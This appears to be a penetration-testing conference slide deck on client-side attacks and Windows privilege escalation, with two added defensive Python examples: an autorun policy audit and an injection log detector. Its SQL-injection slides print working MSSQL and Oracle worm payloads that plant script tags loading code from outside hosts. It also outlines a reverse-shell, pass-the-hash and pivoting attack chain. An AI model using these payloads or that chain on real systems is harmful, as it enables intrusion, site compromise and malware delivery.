Tactical Assassins : Client-Side OWNage


Prathan Phongthiproek
ACIS Professional Center
Senior Information Security Consultant
Who am I ?!
- Instructor / Speaker
- Red Team : Penetration Tester (Team Leader)
- Security Consultant / Researcher
- CWH Underground
- Exploits and Vulnerabilities Disclosure
  - Milw0rm, Exploit-db, Security Focus, Secunia, Zeroday, etc
Let’s Talk!
- Attack Layer 8: Client-Side OWNage
  - MS Office (Evil Macro)
  - Malicious Adobe PDF
  - Malicious USB
  - One-Click Attack
  - Evil-Twin Attack!
- Built-in Pen-Test Tactics
  - Black Hat versus White Hat
  - Using Black Hat styles to Compromise system
- Operation CloudBurst
Client-Side OWNage
The Way to Attack Layer 8!
MS Office (Evil Macro)!
- MS Office is Evil !!
Malicious Adobe PDF!

Figure: Malicious PDF File
Malicious USB!
- Autoplay NOT Autorun
- Turn off Autoplay -> still vulnerable to an evil USB

Figure: registry value 0xff under HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer
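A defender's audit of the setting the slide points at, added here as an example and not part of the deck. It interprets the 0xff mask shown on the slide and reports which drive types would still autorun under a weaker mask. It assumes the value the slide writes 0xff to is NoDriveTypeAutoRun (the slide names only the key and the data) and uses Microsoft's documented bit meanings for that value; the 0x91 sample is a constructed pre-hardening value, not read from any system.

```python
"""Audit the NoDriveTypeAutoRun policy the slide's 0xff refers to.

Added example, not from the slide deck. It assumes the 0xff on the slide is the
NoDriveTypeAutoRun REG_DWORD under the Policies\\Explorer key the slide names;
the bit meanings follow Microsoft's documentation of that value. The mask only
governs autorun handling per drive type, which is the slide's point: switching
off the Autoplay prompt alone does not cover the same ground.
"""

# Hive-relative path quoted on the slide (backslashes restored).
POLICY_KEY = r"Software\Microsoft\Windows\CurrentVersion\Policies\Explorer"
VALUE_NAME = "NoDriveTypeAutoRun"  # assumption: the value the slide's 0xff is written to
HARDENED_MASK = 0xFF               # the value shown on the slide: every drive type disabled

# Bit set in the mask -> drive type whose autorun is DISABLED.
DRIVE_TYPE_BITS = {
    0x01: "unknown",
    0x04: "removable",
    0x08: "fixed",
    0x10: "network",
    0x20: "cdrom",
    0x40: "ramdisk",
    0x80: "reserved",
}


def parse_reg_value(text):
    """Accept the forms `reg query` prints (0xff, 0x91) or plain decimal."""
    text = text.strip().lower()
    return int(text, 16) if text.startswith("0x") else int(text, 10)


def autorun_enabled_types(mask):
    """Drive types that still autorun under this mask (empty set when hardened)."""
    return {name for bit, name in DRIVE_TYPE_BITS.items() if not mask & bit}


def assess(mask):
    """Summarise a mask for a hardening report."""
    return {
        "mask": "0x%02x" % mask,
        "hardened": mask == HARDENED_MASK,
        "still_autorun": sorted(autorun_enabled_types(mask)),
    }


def read_live_value():
    """On Windows, read the policy from HKLM then HKCU (the slide shows HKCU).
    Returns None off Windows or when neither hive sets the value."""
    try:
        import winreg  # only present on Windows
    except ImportError:
        return None
    for hive in (winreg.HKEY_LOCAL_MACHINE, winreg.HKEY_CURRENT_USER):
        try:
            with winreg.OpenKey(hive, POLICY_KEY) as key:
                value, _kind = winreg.QueryValueEx(key, VALUE_NAME)
                return int(value)
        except OSError:
            continue
    return None


if __name__ == "__main__":
    live = read_live_value()
    # 0x91 is a constructed pre-hardening sample used when no live value is available.
    samples = [live] if live is not None else [0x91, parse_reg_value("0xff")]
    for sample in samples:
        print(assess(sample))
```

Run on a Windows host it reports the live policy; elsewhere it walks the two constructed samples so the interpretation logic can be exercised offline.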
One-Click Attack!
- SQL Injection Worms - MSSQL!

     ';DECLARE%20@S%20NVARCHAR(4000);SET%20@S=CAST
      (0x4400450043004C004100520045002000400054002000760061
      0072006300680061007200280032003500350029002C004000430
      02000760061007200630068006100720028003200350035002900
      20004400450043004C0041005200450020005400610062006C00
      65005F0043007500720073006F007200200043005500520053004
      F005200200046004F0052002000730065006C006500630074002
      00061002E006E0061006D0065002C0062002E006E0061006D00
      65002000660072006F006D0020007300790073006F0062006A00
      6500630074007300200061002C0073007900730063006F006C00
      75006D006E007300200062002000770068006500720065002000
      61002E00690064003D0062002E0069006400200061006E006400
      200061002E00780074007900700065003D002700750027002000
      61006E0064002000280062002E00780074007900700065003D00
      3900390020006F007200200062002E00780074007900700065003
      D003300350020006F007200200062002E0078007400790070006
      5003D0032003300310020006F007200200062002E00780074007
      900700065003D003100AS%20NVARCHAR(4000));EXEC(@S);--
- SQL Injection Worms - MSSQL! (decoded)

     ';DECLARE%20@S%20NVARCHAR(4000);SET%20@S=CAST
      (DECLARE @T varchar(255),@C varchar(255) DECLARE Table_Cursor CURSOR FOR
      select a.name,b.name from sysobjects a,syscolumns b where a.id=b.id and
      a.xtype='u' and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167)
      OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO @T,@C WHILE(@@FETCH_STATUS=0)
      BEGIN exec('update ['+@T+'] set ['+@C+']=rtrim(convert(varchar,['+@C+']))
      +''<script src=http://www.fengnima.cn/k.js></script>''') FETCH NEXT FROM
      Table_Cursor INTO @T,@C END CLOSE Table_Cursor DEALLOCATE Table_Cursor AS
      %20NVARCHAR(4000));EXEC(@S);--
- SQL Injection Worms - Oracle!

      http://127.0.0.1:81/ora4.php?name=1 and 1=(select
       SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES
       ('FOO','BAR','DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE
       PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
       begin execute immediate '''''''' alter session set current_schema=SCOTT '''''''';
       execute immediate ''''''''commit'''''''';for rec in (select chr(117)||chr(112)||chr(100)||
       chr(97)||chr(116)|| chr(101)||chr(32)||T.TABLE_NAME||chr(32)||chr(115)||chr(101)||
       chr(116)||chr(32)||C.column_name||chr(61)||C.column_name|| chr(124)||chr(124)||
       chr(39)||chr(60)||chr(115)||chr(99)||chr(114)||chr(105)||chr(112)||chr(116)||chr(32)||
       chr(115)||chr(114)||chr(99)|| chr(61)||chr(34)||chr(104)||chr(116)||chr(116)||chr(112)||
       chr(58)||chr(47)||chr(47)||chr(119)||chr(119)||chr(119)||chr(46)||chr(110)|| chr(111)||
       chr(116)||chr(115)||chr(111)||chr(115)||chr(101)||chr(99)||chr(117)||chr(114)||chr
       (101)||chr(46)||chr(99)||chr(111)|| chr(109)||chr(47)||chr(116)||chr(101)||chr(115)||
       chr(116)||chr(46)||chr(106)||chr(115)||chr(34)||chr(62)||chr(60)||chr(47)||chr(115)||
       chr(99)||chr(114)||chr(105)||chr(112)||chr(116)||chr(62)||chr(39) as foo FROM
       ALL_TABLES T,ALL_TAB_COLUMNS C WHERE T.TABLE_NAME =
       C.TABLE_NAME and T.TABLESPACE_NAME like chr(85)||chr(83)||chr(69)||chr
       (82)||chr(83) and C.data_type like chr(37)||chr(86)||chr(65)||chr(82)||chr(67)||chr
       (72)||chr(65)||chr(82)||chr(37) and c.data_length>200) loop EXECUTE
       IMMEDIATE rec.foo;end loop;execute immediate
       ''''''''commit'''''''';end;'''';END;'';END;--','SYS',0,'1',0) from dual)--

Figure: Link to Malicious Website -> Reverse Shell to Attackers
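Detection logic for the request shapes on the three SQL-injection slides above, added here as an example and not part of the deck: it URL-decodes web-server log lines, looks for the DECLARE / CAST(0x...) / EXEC(@S) shape of the MSSQL worm and the chr()||chr() chain of the Oracle variant, and decodes the embedded blob so an analyst can see what was actually sent. All regexes, log lines and hex/chr() blobs are this editor's constructions; the blobs encode harmless fragments, and the hint words come from what the decoded payload on the slide does (cursor over sysobjects/syscolumns, update, script tag).

```python
"""Spot hex-encoded T-SQL and chr()-chained PL/SQL injection payloads in web logs.

Added example, not from the slide deck. The regexes, sample log lines and the
short hex/chr() blobs are this editor's constructions; the only page-derived
input is the injection shape shown on slides 24-26:
  ';DECLARE @S NVARCHAR(4000);SET @S=CAST(0x... AS NVARCHAR(4000));EXEC(@S);--
and the Oracle variant built from chr(n)||chr(n)||... concatenation.
"""
import re
from urllib.parse import unquote

# Requests arrive %-encoded; every pattern is applied to the decoded line.
DECLARE_RE = re.compile(r"DECLARE\s+@\w+\s+N?VARCHAR\s*\(\s*\d+\s*\)", re.I)
CAST_HEX_RE = re.compile(r"CAST\s*\(\s*0x([0-9a-f]+)\s+AS\s+N?VARCHAR", re.I)
EXEC_RE = re.compile(r"EXEC\s*\(\s*@\w+\s*\)", re.I)
# Eight or more chr(n) terms glued with || is the Oracle obfuscation on slide 26.
CHR_CHAIN_RE = re.compile(r"(?:chr\(\d+\)\s*\|\|\s*){7,}chr\(\d+\)", re.I)
# Substrings in a decoded payload that match what the deck's decoded worm does.
PAYLOAD_HINTS = ("sysobjects", "syscolumns", "cursor", "update ", "<script")


def decode_hex_payload(hexstr):
    """CAST(0x... AS NVARCHAR) means UTF-16LE; fall back to latin-1 for odd blobs."""
    if len(hexstr) % 2:
        hexstr = hexstr[:-1]  # a truncated trailing nibble, as on a wrapped slide
    raw = bytes.fromhex(hexstr)
    try:
        return raw.decode("utf-16-le")
    except UnicodeDecodeError:
        return raw.decode("latin-1")


def decode_chr_chain(chain):
    """Turn chr(117)||chr(112)... into the text it concatenates to."""
    return "".join(chr(int(n)) for n in re.findall(r"chr\((\d+)\)", chain, re.I))


def payload_hints(decoded):
    low = decoded.lower()
    return [h for h in PAYLOAD_HINTS if h in low]


def inspect_request(line):
    """Return a finding for one log line, or None when no injection shape is present."""
    decoded = unquote(line)
    indicators = []
    payload = None
    if DECLARE_RE.search(decoded):
        indicators.append("declare_nvarchar")
    if EXEC_RE.search(decoded):
        indicators.append("exec_variable")
    m = CAST_HEX_RE.search(decoded)
    if m:
        indicators.append("cast_hex")
        payload = decode_hex_payload(m.group(1))
    c = CHR_CHAIN_RE.search(decoded)
    if c:
        indicators.append("chr_chain")
        payload = decode_chr_chain(c.group(0))
    # An encoded blob is evidence on its own; otherwise demand two independent
    # indicators so a stray "exec" or "cast" in a legitimate URL does not alert.
    if payload is None and len(indicators) < 2:
        return None
    return {"indicators": indicators, "decoded_payload": payload,
            "hints": payload_hints(payload) if payload else []}


def scan(lines):
    """Return (line_number, finding) for every suspicious line."""
    results = []
    for no, line in enumerate(lines, 1):
        finding = inspect_request(line)
        if finding:
            results.append((no, finding))
    return results


# Constructed samples. The hex blobs encode harmless T-SQL fragments (the first
# tokens the slide's own blob decodes to, and a metadata SELECT) in UTF-16LE.
HEX_A = "DECLARE @T varchar(255)".encode("utf-16-le").hex().upper()
HEX_B = "DECLARE Table_Cursor CURSOR FOR select a.name from sysobjects a,syscolumns b".encode("utf-16-le").hex()
CHR_C = "||".join("chr(%d)" % ord(ch) for ch in "update t set c=c")  # decodes to that text
SAMPLE_LOG = [
    '10.0.0.5 - - [01/Mar/2010:10:12:01 +0700] "GET /news.asp?id=42 HTTP/1.1" 200 5120',
    '10.0.0.9 - - [01/Mar/2010:10:12:07 +0700] "GET /news.asp?id=42;DECLARE%20@S%20NVARCHAR(4000);'
    'SET%20@S=CAST(0x' + HEX_A + '%20AS%20NVARCHAR(4000));EXEC(@S);-- HTTP/1.1" 500 312',
    '10.0.0.7 - - [01/Mar/2010:10:12:09 +0700] "GET /search.asp?q=cast%20iron%20exec HTTP/1.1" 200 2048',
    '10.0.0.9 - - [01/Mar/2010:10:12:11 +0700] "GET /news.asp?id=42;DECLARE%20@S%20NVARCHAR(4000);'
    'SET%20@S=CAST(0x' + HEX_B + '%20AS%20NVARCHAR(4000));EXEC(@S);-- HTTP/1.1" 500 312',
    '10.0.0.3 - - [01/Mar/2010:10:13:00 +0700] "GET /ora.php?name=1%20and%201=(select%20' + CHR_C
    + '%20from%20dual) HTTP/1.1" 200 77',
]

if __name__ == "__main__":
    for no, finding in scan(SAMPLE_LOG):
        print(no, finding["indicators"], finding["hints"], repr(finding["decoded_payload"]))
```

The decoded payload is what makes the alert actionable: the hex form defeats naive keyword matching on the raw request, while the UTF-16LE decode exposes the cursor over sysobjects/syscolumns and the injected script tag that the slide's own decoded example shows.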
Evil-Twin Attack!
- Karma + Metasploit = Karmetasploit !!
  - Rogue Access Point (Evil Twin): steals usernames, passwords and information from users of public wireless hotspots
  - Why don’t we steal something evil like credit cards (Pay to Play)??
Built-in Pen-Test Tactics!
Black Hat versus White Hat!

Black Hat: Thinking Outside of the Box
- Knows one piece of information and has to expand from there
- Compromises all systems, then targeted attack
- All methodologies integrated
- Manual footprinting, no noisy scan, just Nmap and 0-day attack
- Attack Layer 8: Client-Side OWNage

White Hat: Thinking Inside the Box
- Assigned a limited block of IP addresses
- Unable to go beyond the scope of the approved list: only touch xyz hosts, don’t touch abc host
- Follows Pen-Test methodologies: OSSTMM, NIST, ISSAF
- Downloads exploits from Milw0rm, exploits with Core Impact, CANVAS, Metasploit
- Oops, I cannot hack user.
Using Black Hat styles to Compromise system
- Pen-Tester must “think outside of the box”
- Attack Layer 8: more effective results
- Pen-Test with Black Hat styles
  - Using Black Hat mind
  - Email address enumeration
  - Social networking (Maltego)
  - Social engineering (Adobe PDF, Evil Macro, One-Click Attack, IE Aurora, etc)
  - Information gathering: all subdomains
    - xyz.victim.com, abc.victim.com, 123.victim.com
  - Blind test, compromise all systems and target attack
Operation CloudBurst!
KiTrap0D – Local Ring0 Kernel Exploit
- MS Windows NT #GP Trap Handler Allows Users to Switch Kernel Stack
- Affects every release of the Windows NT kernel (Windows 2000, XP, Server 2003, Vista, Server 2008, 7)
- Not affected: Windows 7 (64-bit), Windows Server 2008 (64-bit, Itanium)
- Patch released as MS10-015 on Feb 09 2010
- 0-day for 1 month. W00t ! W00t !

Figure caption: Get The Hell Outta Here !!
Token Kidnapping – Elevate Privilege
- Token - Web Cookies
- On Windows XP / 2003 – Windows Services run as the SYSTEM account
  - Compromise of a Service == Full System Compromise
- On Windows Vista / 2008 - LocalService / NetworkService == System
- Affects every release of the Windows NT kernel (Windows 2000, XP, Server 2003, Vista, Server 2008, 7)
- Patch released as MS09-012 on April 14 2009
- 0-day for 1 year. W00t ! W00t !!
- Black hat mind !!
  - Combine Attack Layer 8 + KiTrap0D + Token Kidnapping
Operation CloudBurst
- Start mission with Attack Layer 8
  - SPAM Mail / 1-Click Ownage
  - Reverse Shell to Attacker
- KiTrap0D – The Message From Slave to God
  - 0-Day Ring0 xpl, All Windows OS
- Maintain Access
  - Pivot (Tunneling), Backdoor Position
- Compromise All Systems and Domain Controller
  - Impersonate Token, Pass-The-Hash Attack

Operation CloudBurst!
Figure: attack-path diagram (Intranet / Internet): Reverse Shell connection to Attacker; KiTrap0D XPL; Pivot Network – Route Add; Attack Network – Pass-the-Hash, Impersonate Token
If someone is still in the room.. Q&A!

           THANK YOU!
